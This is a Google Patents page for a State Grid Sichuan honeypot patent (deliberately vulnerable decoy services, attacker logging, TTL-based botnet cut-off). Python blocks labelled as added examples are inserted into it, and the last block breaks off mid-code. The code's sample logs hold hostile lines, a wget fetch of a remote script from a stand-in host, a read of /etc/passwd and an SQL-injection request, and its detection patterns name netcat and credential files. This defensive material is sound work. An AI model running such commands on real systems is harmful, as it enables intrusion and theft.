CN114070630A - Viscous honeypot system and interaction method thereof - Google Patents


Info

Publication number
CN114070630A
Authority
CN
China
Prior art keywords
module
honeypot
environment
data
service
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN202111365005.0A
Other languages
Chinese (zh)
Inventor
唐海东
易伟
熊伟
兰沂梅
陈亮
汪晓帆
谢廷杰
王后勤
朱礼鹏
曾仕伦
杨灏
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
State Grid Sichuan Electric Power Co Ltd
Original Assignee
State Grid Sichuan Electric Power Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by State Grid Sichuan Electric Power Co Ltd
Priority to CN202111365005.0A
Publication of CN114070630A
Legal status: Pending

Classifications

CPC classes (the H ELECTRICITY > H04L and G PHYSICS > G06F parent hierarchies collapsed to their leaf entries):
    • H04L63/1491 Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
    • G06F21/55 Detecting local intrusion or implementing counter-measures
    • G06F21/577 Assessing vulnerabilities and evaluating computer system security
    • G06F9/5083 Techniques for rebalancing the load in a distributed system
    • H04L63/0281 Proxies
    • H04L63/1416 Event detection, e.g. attack signature detection
    • H04L63/1433 Vulnerability analysis
    • H04L63/1466 Active attacks involving interception, injection, modification, spoofing of data unit addresses, e.g. hijacking, packet injection or TCP sequence number attacks
    • H04L2463/144 Detection or countermeasures against botnets

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Hardware Design (AREA)
  • Software Systems (AREA)
  • Theoretical Computer Science (AREA)
  • Computing Systems (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Physics & Mathematics (AREA)
  • General Physics & Mathematics (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)

Abstract

The invention discloses a viscous honeypot system and an interaction method thereof. A virtual environment is built through proxy IP addresses, the honeypot system is monitored and managed, network connections are disconnected in time according to the botnet risk, and multi-task attack loads are balanced across different operation units so that downtime is avoided. The honeypot system and its interaction method are thereby optimized, and its operating efficiency and its own security are improved.

Description

Viscous honeypot system and interaction method thereof
Technical Field
The invention relates to the field of network security, in particular to a viscous honeypot system and an interaction method thereof.
Background
Honeypot technology is a technology for deceiving Internet attackers. A honeypot can generally be regarded as an unattended but closely monitored network host that contains fake high-value resources and some vulnerabilities, so as to lure intruders into attacking the honeypot host and thereby protect the real hosts. At the same time, the honeypot records all the commands the attacker issues, and from these a means of defending the real host against the attack is established. With honeypot technology, unknown attacks can be resisted to a certain extent and the protective capability of the actual system is strengthened.
The existing honeypot technology has the following problems:
1. most honeypots are low-interaction data analysis technologies, so they cannot effectively record the attacker's methods;
2. after a hacker enters the honeypot through the security hole deliberately left in it, there is no corresponding data alarm and handling method, so the honeypot system can be taken over by the hacker and turned into a botnet node;
3. the honeypot system is too easy to enter, which raises the hacker's suspicion and causes the deception to fail;
4. when the honeypot system is attacked by several hackers at the same time, it easily goes down.
Disclosure of Invention
To address these problems, the invention provides a viscous honeypot system and an interaction method thereof, which solve the problems of optimization, efficiency and security of the honeypot system.
The invention is realized by the following technical scheme:
a viscous honeypot system comprises a proxy IP module, a virtual environment module, an environment vulnerability module, a data recording module, a data storage module, a honeypot management module, an emergency processing module and a load balancing module, wherein the proxy IP module is used for distributing proxy IP addresses to virtual machines to construct a new virtual environment; the virtual environment module is used for building a system environment image according to the proxy IP address to simulate a real service system environment; the environment vulnerability module is used for building an intranet asset framework and a Web service framework with vulnerabilities in the system environment; the data recording module is used for recording the operation records of attackers during penetration, and the operation records comprise the IP addresses used, the attack duration and the sensitive operation commands; the data storage module is used for storing the operation records of attackers; the honeypot management module is used for monitoring the system environment and analysing, processing and displaying the monitoring data; the emergency processing module is used for blocking the intrusion of botnets; the load balancing module is used for balancing the load of each service task; the proxy IP module is connected with the virtual environment module, the virtual environment module is connected with the environment vulnerability module, the environment vulnerability module is connected with the data recording module, the data recording module is connected with the data storage module, the data storage module is connected with the honeypot management module, and the honeypot management module is connected with the emergency processing module and the load balancing module respectively.
The invention first constructs a virtual environment through proxy IP addresses and builds a system environment image to simulate a real service system environment, such as Linux, Windows or other system environments. This avoids exposing the trap, brings the honeypot closer to a directly facing real environment system, increases the difficulty of entering the honeypot system, lowers the attacker's suspicion, and at the same time buys more operating time for pinpointing the attacker. In addition, a honeypot management module and an emergency processing module are provided, so that the honeypot system can be monitored and alarms raised in real time, and security measures such as interrupting the network connection can be taken in real time according to the monitoring situation, reducing the risk that the honeypot system is exploited by hackers and turned into a botnet. Finally, a load balancing module distributes the task load evenly when multiple simultaneous attacks are received, so that system downtime caused by an excessive network load is avoided and the survivability of the honeypot system is improved.
Further, the proxy IP module comprises a proxy IP pool constructed by a cloud platform.
Further, the virtual environment module comprises a VMware virtual machine, a Docker container running in the VMware virtual machine, and a Debian system built in the Docker container.
Further, the intranet asset framework comprises a database, and an SSH service, a Telnet service and an SMTP service with weak-password vulnerabilities; the Web service framework comprises a Web server built in the Debian system that has a file upload vulnerability, an SQL injection vulnerability, a command injection vulnerability and a cross-site scripting vulnerability.
Further, the data recording module comprises a Web server log, a system log and network probes. The network probes comprise an extranet probe and an intranet probe: the extranet probe captures, filters and records the data packets of the Web server, the intranet probe captures, filters and records the intranet data flow, and the network probes send the recorded data to the data storage module.
Further, the data storage module comprises a MySQL database, and the MySQL database is isolated from the database in the intranet asset framework and located in a different network segment.
Further, the honeypot management module comprises a Management Console platform, which manages the data collected by the honeypot through the MySQL database and monitors the state of the system environment and raises alarms in real time.
Further, the emergency processing module comprises a TTL monitor and a network termination switch. The TTL monitor monitors for abnormally low time-to-live values, and the network termination switch interrupts or disconnects a network connection according to the state of the TTL monitor. A possible botnet intrusion into the honeypot system is identified by combining an abnormally low TTL with the data flow intercepted by the network probes; the network termination switch then disconnects and interrupts the unsafe network connection, protecting the honeypot from being exploited by an attacker and turned into a botnet node.
Further, the load balancing module comprises DnsLoad Balance, which is configured to share the load of the intranet SSH service, Telnet service and SMTP service across multiple operation units. This avoids honeypot downtime caused by an attacker penetrating several services at the same time.
In another implementation of the present invention, a viscous honeypot system interaction method includes: distributing proxy IP addresses to virtual machines to construct a new virtual environment in proxy IP form; building a system environment image in the new virtual environment to simulate a real service system environment; establishing an intranet asset framework and a Web service framework with vulnerabilities in the system environment; using iptables to redirect the ports of the real business environment to the ports of the vulnerable framework in the honeypot system; recording and storing the operation records of attackers during penetration, the operation records comprising the IP addresses used, the attack duration and the sensitive operation commands; at the same time monitoring the system environment and analysing, processing and displaying the monitoring data; and balancing the load of each service task according to the real-time state of the system environment, and blocking the intrusion of botnets.
Compared with the prior art, the invention has the following advantages and beneficial effects:
an IP address is randomly supplied to the VMware virtual machine from the proxy IP pool, a new virtual machine is generated with the new IP address, and a vulnerable virtual environment is simulated, which increases the difficulty of entering the honeypot system, lowers the attacker's suspicion, gives security personnel more time to handle the attack event and pins down the attacker; the database storing the attack data is managed and analysed through the Management Console platform, the state of the honeypot is monitored in real time, and alarms are raised on abnormal data; through the TTL monitor and the network termination switch the security of the honeypot system itself is monitored, reducing the risk that the honeypot is exploited by hackers and turned into a botnet; and by deploying DnsLoad Balance in the honeypot system, the network load caused by several hackers attacking the honeypot at the same time is reduced, the stickiness of the honeypot system is enhanced and its survivability is improved.
Drawings
In order to more clearly illustrate the technical solutions of the exemplary embodiments of the present invention, the drawings that are required to be used in the embodiments will be briefly described below, it should be understood that the following drawings only illustrate some embodiments of the present invention and therefore should not be considered as limiting the scope, and that for those skilled in the art, other related drawings can be obtained from these drawings without inventive effort. In the drawings:
FIG. 1 is a schematic diagram of the framework of the honeypot system according to Example 1.
Detailed Description
In order to make the objects, technical solutions and advantages of the present invention more apparent, the present invention is further described in detail below with reference to examples and accompanying drawings, and the exemplary embodiments and descriptions thereof are only used for explaining the present invention and are not meant to limit the present invention.
Example 1
A viscous honeypot system, as shown in FIG. 1, includes the following modules:
The proxy IP module is used for distributing proxy IP addresses to the virtual machines to construct a new virtual environment; it mainly comprises a proxy IP pool constructed by a cloud platform.
The virtual environment module is used for building a system environment image according to the proxy IP address to simulate a real service system environment; it comprises a VMware virtual machine, a Docker container running in the VMware virtual machine and a Debian system built in the Docker container.
The environment vulnerability module is used for building an intranet asset framework and a Web service framework with vulnerabilities in the system environment; the intranet asset framework comprises a database and an SSH service, a Telnet service and an SMTP service with weak-password vulnerabilities; the Web service framework comprises a Web server built in the Debian system that has a file upload vulnerability, an SQL injection vulnerability, a command injection vulnerability and a cross-site scripting vulnerability.
The data recording module is used for recording the operation records of attackers during penetration, and the operation records comprise the IP addresses used, the attack duration and the sensitive operation commands; it comprises a Web server log, a system log and network probes. The network probes comprise an extranet probe and an intranet probe: the extranet probe captures, filters and records the data packets of the Web server, the intranet probe captures, filters and records the intranet data flow, and the network probes send the recorded data to the data storage module.
The data storage module is used for storing the operation records of attackers; it comprises a MySQL database, which is isolated from the database in the intranet asset framework and located in a different network segment.
The honeypot management module is used for monitoring the system environment and analysing, processing and displaying the monitoring data; it comprises a Management Console platform, which manages the data collected by the honeypot through the MySQL database and at the same time monitors the state of the system environment and raises alarms in real time.
The emergency processing module is used for blocking the intrusion of botnets; it comprises a TTL monitor and a network termination switch. The TTL monitor monitors for abnormally low time-to-live values, and the network termination switch interrupts or disconnects the network connection according to the state of the TTL monitor. A possible botnet intrusion into the honeypot system is identified by combining an abnormally low TTL with the data flow intercepted by the network probes; the network termination switch then disconnects and interrupts the unsafe network connection, protecting the honeypot from being exploited by an attacker and turned into a botnet node.
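As an added example, not code from the patent or from State Grid Sichuan, the following Python sketches the data recording module and the emergency processing module described above as detection logic over probe records. The patent names the signals (attacker IP, attack duration, sensitive operation commands, abnormally low TTL, intranet data flow) but fixes no record format and no thresholds, so the log layout, the pattern lists, the honeypot address 10.10.0.5, TTL_FLOOR, FANOUT_LIMIT and the iptables/conntrack commands the termination switch would run are all assumptions made here; the sample log is constructed.

```python
# Added example (not the patent's code): the data recording module and the
# emergency processing module of Example 1 as detection logic over probe records.
# Record layout, pattern lists, TTL_FLOOR and FANOUT_LIMIT are assumptions; the
# patent names the signals (ip, attack duration, sensitive commands, low TTL,
# intranet flows) but fixes no format or thresholds.
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass, field

HONEYPOT_IP = "10.10.0.5"  # assumed address of the Debian container
TTL_FLOOR = 8              # assumed: a received TTL below this is "abnormally low"
FANOUT_LIMIT = 4           # assumed: honeypot reaching >= this many hosts on one port = scan/C2

# Constructed sample log, one event per line:
#   <epoch> WEB <src_ip> <ttl> <method> <path>        extranet probe + web server log
#   <epoch> CMD <src_ip> <command ...>                  system log (shell on the honeypot)
#   <epoch> NET <src_ip> <dst_ip> <dst_port> <ttl>      intranet probe
SAMPLE_LOG = """\
1700000000 WEB 203.0.113.7 54 GET /index.php?id=1'%20OR%20'1'='1
1700000012 WEB 203.0.113.7 54 POST /upload.php?file=shell.php
1700000030 CMD 203.0.113.7 wget http://198.51.100.9/bot.sh -O /tmp/b.sh
1700000031 CMD 203.0.113.7 chmod +x /tmp/b.sh
1700000040 CMD 203.0.113.7 ls -la /var/www
1700000041 CMD 203.0.113.7 cat /etc/passwd
1700000045 NET 203.0.113.7 10.10.0.5 22 54
1700000050 NET 10.10.0.5 198.51.100.9 6667 64
1700000051 NET 10.10.0.5 192.0.2.1 22 64
1700000052 NET 10.10.0.5 192.0.2.2 22 64
1700000053 NET 10.10.0.5 192.0.2.3 22 64
1700000054 NET 10.10.0.5 192.0.2.4 22 64
1700000060 NET 203.0.113.99 10.10.0.5 23 3
"""

# "Sensitive operation commands" and suspicious web requests; the concrete lists are assumed.
SENSITIVE_CMDS = [re.compile(p, re.I) for p in (
    r"\b(wget|curl)\b", r"\bchmod\s+\+?x\b", r"/etc/(passwd|shadow)",
    r"\b(nc|ncat|netcat)\b", r"base64\s+-d", r"\bcrontab\b")]
SUSPICIOUS_WEB = [re.compile(p, re.I) for p in (
    r"(%27|')(%20|\s)*(or|and)\b", r"/upload\.php", r"(\.\./|%2e%2e)")]


@dataclass
class OperationRecord:
    ip: str
    first_seen: int
    last_seen: int
    sensitive_commands: list = field(default_factory=list)
    suspicious_requests: list = field(default_factory=list)

    @property
    def attack_duration(self) -> int:
        return self.last_seen - self.first_seen


def parse_events(text: str) -> list:
    """Turn the log into event dicts; malformed lines are skipped, not guessed at."""
    events = []
    for line in text.splitlines():
        p = line.split()
        if len(p) >= 6 and p[1] == "WEB":
            events.append(dict(ts=int(p[0]), kind="WEB", src=p[2], ttl=int(p[3]),
                               method=p[4], path=p[5]))
        elif len(p) >= 4 and p[1] == "CMD":
            events.append(dict(ts=int(p[0]), kind="CMD", src=p[2], cmd=" ".join(p[3:])))
        elif len(p) >= 6 and p[1] == "NET":
            events.append(dict(ts=int(p[0]), kind="NET", src=p[2], dst=p[3],
                               dport=int(p[4]), ttl=int(p[5])))
    return events


def build_operation_records(events) -> dict:
    """Data recording module: per attacker ip, attack duration and sensitive operations."""
    records = {}
    for ev in events:
        if ev["src"] == HONEYPOT_IP:
            continue  # the honeypot's own outbound flows are not an attacker record
        rec = records.setdefault(ev["src"], OperationRecord(ev["src"], ev["ts"], ev["ts"]))
        rec.first_seen = min(rec.first_seen, ev["ts"])
        rec.last_seen = max(rec.last_seen, ev["ts"])
        if ev["kind"] == "CMD" and any(r.search(ev["cmd"]) for r in SENSITIVE_CMDS):
            rec.sensitive_commands.append(ev["cmd"])
        if ev["kind"] == "WEB" and any(r.search(ev["path"]) for r in SUSPICIOUS_WEB):
            rec.suspicious_requests.append(f'{ev["method"]} {ev["path"]}')
    return records


def detect_botnet_risk(events) -> set:
    """Emergency processing module: TTL monitor plus intranet-probe fan-out check.
    Returns (src, dst, dport) tuples the network termination switch should cut."""
    cut = set()
    fanout = defaultdict(set)  # dport -> hosts the honeypot itself connected to
    for ev in events:
        if ev["kind"] != "NET":
            continue
        if ev["ttl"] < TTL_FLOOR:        # abnormally low TTL on a flow seen by the probe
            cut.add((ev["src"], ev["dst"], ev["dport"]))
        if ev["src"] == HONEYPOT_IP:     # honeypot acting as a bot: scanning or beaconing out
            fanout[ev["dport"]].add(ev["dst"])
    for dport, hosts in fanout.items():
        if len(hosts) >= FANOUT_LIMIT:
            cut.update((HONEYPOT_IP, h, dport) for h in hosts)
    return cut


def termination_commands(cut) -> list:
    """What the network termination switch runs (assumed: iptables DROP + conntrack delete)."""
    cmds = []
    for src, dst, dport in sorted(cut):
        cmds.append(f"iptables -I FORWARD -s {src} -d {dst} -p tcp --dport {dport} -j DROP")
        cmds.append(f"conntrack -D -s {src} -d {dst} -p tcp --dport {dport}")
    return cmds


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    for rec in build_operation_records(evs).values():
        print(rec.ip, rec.attack_duration, rec.sensitive_commands, rec.suspicious_requests)
    print("\n".join(termination_commands(detect_botnet_risk(evs))))
```

The fan-out check is what turns the intranet probe data into the botnet signal the patent pairs with the TTL monitor: a honeypot that starts opening connections to many hosts on one port is scanning or beaconing on an attacker's behalf, and the single low-TTL inbound flow alone would not show that. The single outbound connection to port 6667 is recorded but not cut, which is deliberate; one connection is not yet evidence. The regexes are crude on purpose and would be tuned against the honeypot's own logs in a real deployment.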
The load balancing module is used for balancing the load of each service task; it comprises DnsLoad Balance, which distributes the load of the intranet SSH service, Telnet service and SMTP service across multiple operation units. This avoids honeypot downtime caused by an attacker penetrating several services at the same time.
In the physical structure of this Embodiment 1, the signal connections between the modules are specifically: the proxy IP module is connected with the virtual environment module, the virtual environment module is connected with the environment vulnerability module, the environment vulnerability module is connected with the data recording module, the data recording module is connected with the data storage module, the data storage module is connected with the honeypot management module, and the honeypot management module is connected with the emergency processing module and the load balancing module respectively.
In Embodiment 1, a virtual environment is constructed through a proxy IP address and a system environment image is built to simulate a real service system environment, such as Linux, Windows or other system environments. This avoids exposing the trap, brings the system closer to a directly facing real environment system, increases the difficulty of entering the honeypot system, lowers the attacker's suspicion, and buys more operating time for pinpointing the attacker. In addition, the honeypot management module and the emergency processing module allow the honeypot system to be monitored and alarms raised in real time, and security measures such as interrupting the network connection to be taken in real time according to the monitoring situation, reducing the risk that the honeypot system is exploited by hackers and turned into a botnet. Finally, the load balancing module distributes the task load evenly when multiple simultaneous attacks are received, so that system downtime caused by an excessive network load is avoided and the survivability of the honeypot system is improved.
Example 2
Embodiment 2 is a viscous honeypot system interaction method based on Embodiment 1, and includes:
1) distributing proxy IP addresses to virtual machines to construct a new virtual environment in proxy IP form;
2) building a system environment image in the new virtual environment to simulate a real service system environment;
3) establishing an intranet asset framework and a Web service framework with vulnerabilities in the system environment;
4) using iptables to redirect the ports of the real business environment to the ports of the vulnerable framework in the honeypot system;
5) recording and storing the operation records of attackers during penetration, the operation records comprising the IP addresses used, the attack duration and the sensitive operation commands;
6) at the same time monitoring the system environment and analysing, processing and displaying the monitoring data;
7) balancing the load of each service task according to the real-time state of the system environment, and blocking the intrusion of botnets.
Example 3
In this Embodiment 3, on the basis of Embodiment 1, the honeypot system of Embodiment 1 is deployed in a real service environment. The virtual environment module uses an IP address provided by the proxy IP module, a new virtual machine is created in the real environment, and a Docker container inside that virtual machine completes the deployment of the virtual service environment. Docker containers start quickly, cope well with sudden bursts of server load, and scale elastically and rapidly, which makes them suitable for building the virtual service environment. A Debian image is built in the Docker container; Debian is an open-source system with a Linux kernel that, compared with other Linux distributions, is more stable and has simpler and faster memory management and security protection. The environment vulnerability module then completes the build of the honeypot on the Debian system: the SSH, Telnet and SMTP services in the intranet asset framework are opened to anonymous login and given weak passwords.
The services of the real environment are then restricted with iptables. For example, the real SSH service port is changed from 22 to 62222, and iptables redirects ports 22, 23 and 25 to the ports listened on by the honeypot system. When a hacker attacks the intranet services, they enter the virtual environment of the honeypot system directly, and the intranet probe and the system log send the operation data to the MySQL database. When a hacker attacks the real Web site, the port redirection likewise sends them to the virtual Web service framework; when they attack it through common Web vulnerabilities, the extranet probe and the Web server log send the data to the MySQL database. The Management Console platform of the honeypot management module analyses, processes, displays and raises alarms on the attack data stored in the MySQL database in real time.
To prevent the honeypot system from becoming part of a botnet, a TTL monitor controlled by the honeypot management module raises an alarm in real time on connections whose TTL is abnormally low, and the network termination switch promptly disconnects the dangerous connection, so that the honeypot system is protected from the risk of becoming a botnet node while the attack is being studied. DnsLoad Balance, also controlled by the honeypot management module, is added to the honeypot system to relieve the network pressure on the intranet SSH, Telnet and SMTP services. The Management Console platform of Embodiment 1 connects to the TTL monitor, the network termination switch and DnsLoad Balance through separate API interfaces.
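The iptables port redirection of step 4 and of this Example 3, written out as an added example; this is not the patent's own code. The real sshd is assumed to already listen on port 62222 as the example states; the honeypot container address 172.18.0.10, the management segment 10.20.0.0/24 holding the MySQL database and the Management Console, the web decoy on port 80, and the containment rules that keep the honeypot away from the management segment and the real SSH port are assumptions added here.

```python
# Added example (not the patent's code): the port redirection of step 4 of Example 2,
# with the numbers Example 3 gives (real sshd moved to 62222; ports 22, 23, 25 sent to
# the honeypot).  The honeypot container address, the management segment, the web
# decoy port 80 and the containment rules are assumptions, not claims of the patent.
from __future__ import annotations
import shlex
import subprocess
from dataclasses import dataclass


@dataclass(frozen=True)
class RedirectPlan:
    honeypot_ip: str                        # assumed: Debian container reachable from the host
    real_ssh_port: int = 62222              # Example 3: real SSH moved off 22
    decoy_ports: tuple = (22, 23, 25, 80)   # SSH, Telnet, SMTP from the patent; 80 assumed for the web decoy
    mgmt_cidr: str = "10.20.0.0/24"         # assumed: segment of MySQL and the Management Console


def validate(plan: RedirectPlan) -> list:
    """Return the reasons a plan is unsafe (an empty list means it can be applied)."""
    problems = []
    if plan.real_ssh_port in plan.decoy_ports:
        # redirecting the operator's own port into the decoy locks the operator out
        problems.append(f"real SSH port {plan.real_ssh_port} is in the decoy set")
    if not 1 <= plan.real_ssh_port <= 65535:
        problems.append("real SSH port out of range")
    if any(not 1 <= p <= 65535 for p in plan.decoy_ports):
        problems.append("decoy port out of range")
    return problems


def build_rules(plan: RedirectPlan) -> list:
    """iptables rules: decoy ports DNAT into the honeypot, management traffic exempt,
    honeypot contained, real SSH reachable on its moved port."""
    problems = validate(plan)
    if problems:
        raise ValueError("; ".join(problems))
    ports = ",".join(str(p) for p in plan.decoy_ports)
    hp = plan.honeypot_ip
    return [
        # management segment keeps its direct path and is never steered into the decoy
        f"iptables -t nat -I PREROUTING -s {plan.mgmt_cidr} -j RETURN",
        # everyone else hitting the classic ports lands in the honeypot on the same port
        f"iptables -t nat -A PREROUTING -p tcp -m multiport --dports {ports} "
        f"-j DNAT --to-destination {hp}",
        f"iptables -A FORWARD -p tcp -d {hp} -m multiport --dports {ports} "
        f"-m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT",
        # containment: the honeypot must not reach the management segment or the real SSH port
        f"iptables -I FORWARD -s {hp} -d {plan.mgmt_cidr} -j DROP",
        f"iptables -I INPUT -s {hp} -p tcp --dport {plan.real_ssh_port} -j DROP",
        # real SSH stays reachable on its moved port
        f"iptables -A INPUT -p tcp --dport {plan.real_ssh_port} -m conntrack --ctstate NEW -j ACCEPT",
    ]


def apply_rules(rules: list, dry_run: bool = True) -> int:
    """Print (dry run) or execute the rules; returns how many were handled."""
    for rule in rules:
        if dry_run:
            print(rule)
        else:
            subprocess.run(shlex.split(rule), check=True)
    return len(rules)


if __name__ == "__main__":
    apply_rules(build_rules(RedirectPlan(honeypot_ip="172.18.0.10")))
```

Two checks before running this without the dry run: confirm from a second session that sshd really answers on 62222, because a plan that redirects 22 while sshd still listens there locks the operator out (validate() only catches the case where the real port is in the decoy set); and, with Docker, inspect the chain order with `iptables -t nat -L PREROUTING -n --line-numbers`, since Docker inserts its own DOCKER chain and net.ipv4.ip_forward must be 1 for the DNAT'd packets to reach the container. DNAT without a port keeps the original destination port, which is exactly the "22, 23 and 25" mapping Example 3 describes.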
As will be appreciated by one skilled in the art, embodiments of the present application may be provided as a method, system, or computer program product. Accordingly, the present application may take the form of an entirely hardware embodiment, an entirely software embodiment or an embodiment combining software and hardware aspects. Furthermore, the present application may take the form of a computer program product embodied on one or more computer-usable storage media (including, but not limited to, disk storage, CD-ROM, optical storage, and the like) having computer-usable program code embodied therein.
The present application is described with reference to flowchart illustrations and/or block diagrams of methods, apparatus (systems), and computer program products according to embodiments of the application. It will be understood that each flow and/or block of the flow diagrams and/or block diagrams, and combinations of flows and/or blocks in the flow diagrams and/or block diagrams, can be implemented by computer program instructions. These computer program instructions may be provided to a processor of a general purpose computer, special purpose computer, embedded processor, or other programmable data processing apparatus to produce a machine, such that the instructions, which execute via the processor of the computer or other programmable data processing apparatus, create means for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be stored in a computer-readable memory that can direct a computer or other programmable data processing apparatus to function in a particular manner, such that the instructions stored in the computer-readable memory produce an article of manufacture including instruction means which implement the function specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be loaded onto a computer or other programmable data processing apparatus to cause a series of operational steps to be performed on the computer or other programmable apparatus to produce a computer implemented process such that the instructions which execute on the computer or other programmable apparatus provide steps for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
It will be understood by those skilled in the art that all or part of the steps of the above methods can be implemented by hardware under the control of program instructions; the program can be stored in a computer-readable storage medium and, when executed, performs the corresponding method steps. The storage medium may be a ROM/RAM, a magnetic disk, an optical disk, etc.
The above-mentioned embodiments are intended to illustrate the objects, technical solutions and advantages of the present invention in further detail, and it should be understood that the above-mentioned embodiments are merely exemplary embodiments of the present invention, and are not intended to limit the scope of the present invention, and any modifications, equivalent substitutions, improvements and the like made within the spirit and principle of the present invention should be included in the scope of the present invention.

Claims (10)

1. A viscous honeypot system, characterized in that it comprises:
the proxy IP module, used for distributing proxy IP addresses to the virtual machines to construct a new virtual environment;
the virtual environment module, used for building a system environment image according to the proxy IP address to simulate a real service system environment;
the environment vulnerability module, used for building an intranet asset framework and a Web service framework with vulnerabilities in the system environment;
the data recording module, used for recording the operation records of attackers during penetration, the operation records comprising the IP addresses used, the attack duration and the sensitive operation commands;
the data storage module, used for storing the operation records of attackers;
the honeypot management module, used for monitoring the system environment and analysing, processing and displaying the monitoring data;
the emergency processing module, used for blocking the intrusion of botnets;
the load balancing module, used for balancing the load of each service task;
wherein the proxy IP module is connected with the virtual environment module, the virtual environment module is connected with the environment vulnerability module, the environment vulnerability module is connected with the data recording module, the data recording module is connected with the data storage module, the data storage module is connected with the honeypot management module, and the honeypot management module is connected with the emergency processing module and the load balancing module respectively.
2. The viscous honeypot system of claim 1, wherein the proxy ip module comprises a pool of proxy ip addresses built on a cloud platform.
3. The viscous honeypot system of claim 1, wherein the virtual environment module comprises a VMware virtual machine, a Docker container based on the VMware virtual machine, and a Debian system built in the Docker container.
4. The viscous honeypot system of claim 1, wherein the intranet asset framework comprises a database and SSH, Telnet and SMTP services with weak password vulnerabilities; and the Web service framework comprises a Web server built in the Debian system which has a file upload vulnerability, an SQL injection vulnerability, a command injection vulnerability and a cross-site scripting vulnerability.
5. The viscous honeypot system of claim 1, wherein the data recording module comprises a Web server log, a system log and a network probe; the network probe comprises an extranet probe for capturing data packets of the Web server and filtering and recording the data packets, and an intranet probe for capturing intranet data traffic and filtering and recording the intranet data traffic; and the network probe sends all recorded data to the data storage module.
6. The viscous honeypot system of claim 1, wherein the data storage module comprises a MySQL database that is isolated from the database in the intranet asset framework and located in a different network segment.
7. The viscous honeypot system of claim 1, wherein the honeypot management module comprises a management console platform that manages the data collected by the honeypots via the MySQL database while monitoring the state of the system environment and raising real-time alerts.
8. The viscous honeypot system of claim 1, wherein the emergency processing module comprises a TTL monitor configured to monitor for low time-to-live values and a network termination switch configured to interrupt or disconnect a network connection based on a condition of the TTL monitor.
9. The viscous honeypot system of claim 1, wherein the load balancing module comprises DNS load balancing to distribute the load of the intranet SSH service, the Telnet service and the SMTP service across multiple operational units for execution.
10. A viscous honeypot system interaction method, characterized by comprising the following steps:
distributing proxy ip addresses to virtual machines to construct a new virtual environment in the form of proxy ips;
building a system environment mirror image in the new virtual environment to simulate a real service system environment;
establishing an intranet asset framework and a Web service framework with vulnerabilities in the system environment;
redirecting a port of the vulnerability framework in the honeypot system to a port of the real business environment by means of iptables;
recording and storing operation records during penetration by attackers, the operation records comprising the ip addresses used, the attack duration and the sensitive operation commands;
meanwhile, monitoring the system environment, and analyzing, processing and displaying the monitoring data;
and balancing the load of each service task according to the real-time condition of the system environment, and blocking the intrusion of the botnet.
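The recording step of the method above (ip address used, attack duration, sensitive operation commands) and the TTL monitor of the emergency processing module are the parts of the claims that reduce most directly to code. The following Python sketch is an added illustration, not code from the patent or its applicant: it builds per-source operation records from probe log lines and trips a disconnect flag when the lowest observed TTL falls below a threshold. The log line format, the `SENSITIVE_PATTERNS` list, the `MIN_TTL` value and the sample log lines are all constructed assumptions for this example.

```python
"""Operation-record builder for the data recording step (claim 10) with the
TTL check of claim 8.  Added example; the log format and thresholds are
assumptions, not the patent's own design."""
import re
from dataclasses import dataclass, field
from datetime import datetime
from typing import Dict, List, Optional

# Assumed probe log format (constructed for this example):
#   <ISO timestamp> <source ip> ttl=<n> <EVENT> [payload]
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) ttl=(?P<ttl>\d+) "
    r"(?P<event>SESSION_START|CMD|SESSION_END)(?: (?P<payload>.*))?$"
)

# Commands an analyst would flag as sensitive inside a decoy host (assumed list)
SENSITIVE_PATTERNS = [
    re.compile(p) for p in (
        r"/etc/(passwd|shadow)",   # credential files
        r"\b(wget|curl)\b",        # tooling download
        r"\bchmod\s+\+x\b",        # making a payload executable
        r"\b(nc|ncat|netcat)\b",   # reverse/bind shells
        r"\bcrontab\b",            # persistence
    )
]

MIN_TTL = 10  # assumed threshold for the TTL monitor of claim 8


@dataclass
class OperationRecord:
    """One attacker's record: ip, session window, commands and TTL evidence."""
    ip: str
    start: Optional[datetime] = None
    end: Optional[datetime] = None
    commands: List[str] = field(default_factory=list)
    sensitive_commands: List[str] = field(default_factory=list)
    min_ttl_seen: Optional[int] = None

    @property
    def duration_seconds(self) -> float:
        """Attack duration; 0.0 while the session is still open."""
        if self.start is None or self.end is None:
            return 0.0
        return (self.end - self.start).total_seconds()

    @property
    def disconnect(self) -> bool:
        """Network termination switch: trip when the TTL monitor saw a low value."""
        return self.min_ttl_seen is not None and self.min_ttl_seen < MIN_TTL


def is_sensitive(cmd: str) -> bool:
    """True when the command matches any sensitive pattern."""
    return any(p.search(cmd) for p in SENSITIVE_PATTERNS)


def build_records(lines) -> Dict[str, OperationRecord]:
    """Fold probe log lines into one OperationRecord per source ip."""
    records: Dict[str, OperationRecord] = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unparsable probe noise: skip, never crash the recorder
        ip = m["ip"]
        rec = records.setdefault(ip, OperationRecord(ip=ip))
        ts = datetime.fromisoformat(m["ts"])
        ttl = int(m["ttl"])
        rec.min_ttl_seen = ttl if rec.min_ttl_seen is None else min(rec.min_ttl_seen, ttl)
        event, payload = m["event"], m["payload"] or ""
        if event == "SESSION_START":
            rec.start = ts
        elif event == "CMD":
            rec.commands.append(payload)
            if is_sensitive(payload):
                rec.sensitive_commands.append(payload)
        elif event == "SESSION_END":
            rec.end = ts
    return records


# Constructed sample log (documentation addresses, not real attackers)
SAMPLE_LOG = """\
2021-11-17T10:00:00 203.0.113.7 ttl=52 SESSION_START
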